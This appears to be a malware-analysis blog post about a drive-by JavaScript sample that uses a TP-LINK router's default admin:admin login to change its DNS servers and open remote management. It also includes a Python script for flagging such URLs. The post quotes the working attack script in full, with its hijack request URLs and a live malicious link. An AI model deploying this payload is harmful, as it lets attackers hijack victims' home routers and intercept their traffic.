We have recently noticed submissions on Wepawet that try to access local IP addresses. This is of particular interest since the attacker’s intention is to tamper with the configuration of the victim’s home router.

A live example is located at http://freemdsv.com/ad.php?pid=20120811

```javascript
if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) {
    document.writeln("<div style=\'display:none\'>");
    function ip1() {
        i = new Image;
        i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>');
    function ip3() {
        ii = new Image;
        ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip3()>');
    document.writeln("</div>");
}
```

The script basically checks to see if the router is accessible through an image request to:

http://admin:admin@192.168.1.1/images/logo.jpg

So it assumes that the router has been left in its default configuration, with username/password admin:admin, and that it is reachable at the IP address 192.168.1.1. The functions ip1 and ip3 are responsible for the malicious reconfiguration of the router, which they perform with the following requests:

http ://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced

and

http ://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8

The file "PPPoECfgAdvRpm.htm" seems to be the configuration page for the PPPoE Advanced Settings of TP-LINK routers (link). It is very interesting that they change the victim's DNS servers to 58.221.59.217 and 114.114.114.114, which means that the victim is susceptible to man-in-the-middle attacks.

The second request reconfigures the router to be remotely accessible through its web interface (link). This way the attacker can remotely change the settings of the victim's router at will.
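For triaging samples like this one, the following script (an added example, not Wepawet's code) pulls every URL out of a piece of JavaScript, keeps only those aimed at private (LAN) addresses, and flags the three indicators seen above: credentials embedded in the URL, a dnsserver/dnsserver2 change, and a ManageControlRpm.htm request that opens remote management. The indicator names and the embedded SAMPLE_JS (built from the script quoted above) are this example's own.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the three requests issued by the script discussed above,
# embedded here so the example runs offline.
SAMPLE_JS = r"""
i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>');
ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
"""

# A URL runs until whitespace or a quote/angle bracket closes it.
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


def is_private_host(host):
    """True if host is an RFC 1918 / loopback / link-local address."""
    try:
        return ip_address(host).is_private
    except ValueError:
        return False  # hostnames are out of scope for this check


def triage(js):
    """Return one finding per URL that targets a private address."""
    findings = []
    for url in URL_RE.findall(js):
        parts = urlsplit(url)
        if not is_private_host(parts.hostname or ""):
            continue
        finding = {"url": url, "host": parts.hostname,
                   "path": parts.path, "indicators": []}
        # Credentials in the URL: the script's default-password probe.
        if parts.username is not None:
            finding["indicators"].append("embedded-credentials:%s" % parts.username)
        qs = parse_qs(parts.query, keep_blank_values=True)
        # DNS hijack: any non-empty dnsserver/dnsserver2 parameter.
        dns = [v for k in ("dnsserver", "dnsserver2") for v in qs.get(k, []) if v]
        if dns:
            finding["indicators"].append("dns-change:" + ",".join(dns))
        # Remote management: which port, and which source IP is allowed.
        if "ManageControlRpm" in parts.path:
            finding["indicators"].append("remote-management:ip=%s,port=%s" % (
                qs.get("ip", ["?"])[0], qs.get("port", ["?"])[0]))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_JS):
        print(f["host"], f["path"], f["indicators"])
```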

A few reports from Wepawet that perform such attacks are here:

Wepawet report

If you see any related scripts in the wild, or you have information about what the DNS servers are targeting, feel free to contact me on Twitter: @kapravel